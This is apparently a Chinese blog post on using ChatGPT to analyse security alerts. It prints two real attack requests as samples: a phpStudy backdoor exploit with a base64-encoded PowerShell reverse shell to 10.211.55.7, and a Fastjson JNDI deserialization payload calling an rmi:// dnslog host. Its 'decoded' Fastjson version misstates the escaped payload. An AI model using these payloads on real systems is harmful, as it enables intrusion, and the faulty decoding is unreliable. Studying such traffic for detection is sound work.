ChatGPT视角下的告警事件分析处置

0x00写在前面

本次测试仅供学习使用，如若非法他用，与平台和发布者无关，需自行负责！

0x01背景

在人工智能技术浪潮发展推进的背景下，数字化、智能化、多元化的网络安全格局逐渐形成。在这个时代如何有效利用好智能工具，促进工作有效开展，显得极为重要。很多安全领军企业也在大力发展GPT机器人从而实现数据智能化应用，发挥其最佳价值。

0x02ChatGPT视角

思考一个事物的生命周期，从0到1到0的完整过程。

那么，一个告警事件如何完整分析及闭环处置？看chatgpt怎么回答（bing应GPT4.0）从其思考发现已经很全面，后续的分析也将基于此视角和思路进行。

问答bing应

问答gemini.google

0x03告警事件分析

告警事件的来源多样目前很多安全检测产品，如防火墙、WAF、IPS、IDS、NDR等，通过检测规则、语义分析、机器学习、安全模型等。

根据Chatgpt的视角输出简单流程图如下，总体上分为三个过程两个方向（定向、定论、定决，误报与非误报），现在这种分析思路已经运用于安全运营SOAR(安全编排自动化与响应系统)等。

借助Chatgpt对攻击数据进行研判分析，目前从分析效果来看，对安全人员技术要求不是太高，可以简化很多人工参与分析数据的过程，能更简洁快速的输出结果。

以phpStudy后门远程代码执行漏洞为例

请详细判断这个请求数据是否存在攻击行为？

GET /l.php HTTP/1.1Host: 172.17.149.123:8080User-Agent: Go-http-client/1.1Accept-Charset: c3lzdGVtKCdwb3dlcnNoZWxsIC1ub3AgLWMgIiRjbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuU29ja2V0cy5UQ1BDbGllbnQoJzEwLjIxMS41NS43JywxMjM3Nyk7JHN0cmVhbSA9ICRjbGllbnQuR2V0U3RyZWFtKCk7W2J5dGVbXV0kYnl0ZXMgPSAwLi42NTUzNXwlezB9O3doaWxlKCgkaSA9ICRzdHJlYW0uUmVhZCgkYnl0ZXMsIDAsICRieXRlcy5MZW5ndGgpKSAtbmUgMCl7OyRkYXRhID0gKE5ldy1PYmplY3QgLVR5cGVOYW1lIFN5c3RlbS5UZXh0LkFTQ0lJRW5jb2RpbmcpLkdldFN0cmluZygkYnl0ZXMsMCwgJGkpOyRzZW5kYmFjayA9IChpZXggJGRhdGEgMj4mMSB8IE91dC1TdHJpbmcgKTskc2VuZGJhY2syID0gJHNlbmRiYWNrICsgJ1BTICcgKyAocHdkKS5QYXRoICsgJz4gJzskc2VuZGJ5dGUgPSAoW3RleHQuZW5jb2RpbmddOjpBU0NJSSkuR2V0Qnl0ZXMoJHNlbmRiYWNrMik7JHN0cmVhbS5Xcml0ZSgkc2VuZGJ5dGUsMCwkc2VuZGJ5dGUuTGVuZ3RoKTskc3RyZWFtLkZsdXNoKCl9OyRjbGllbnQuQ2xvc2UoKSInKTtwcmludGYoJ15eXicpOw==Accept-Encoding: gzip,deflate

以Fastjson 1.2.24反序列化漏洞攻击漏洞为例

请详细判断这个响应数据是否存在攻击行为？

POST /TF0gcDr5qO6R/index.php?fetch=2 HTTP/1.1
Host: 10.211.55.6
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 698
Connection: close
Cookie: PHPSESSID=15d8h6bqumo7d4geih3f5lafk3
{"name":{"\u0040\u0074\u0079\u0070\u0065":"\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073","\u0076\u0061\u006c":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c"},"x":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"rmi://9g.aa3v3hv1.ul5yv9.dnslog.cn/miao2","autoCommit":true}}

解码后内容

{"name":{"type":"java.lang.Class","val":"java.lang.String"},"x":{"type":"com.sun.rowset.RowSetImpl","dataSourceName":"rmi://9g.aa3v3hv1.ul5yv9.dnslog.cn/miao2","autoCommit":true}}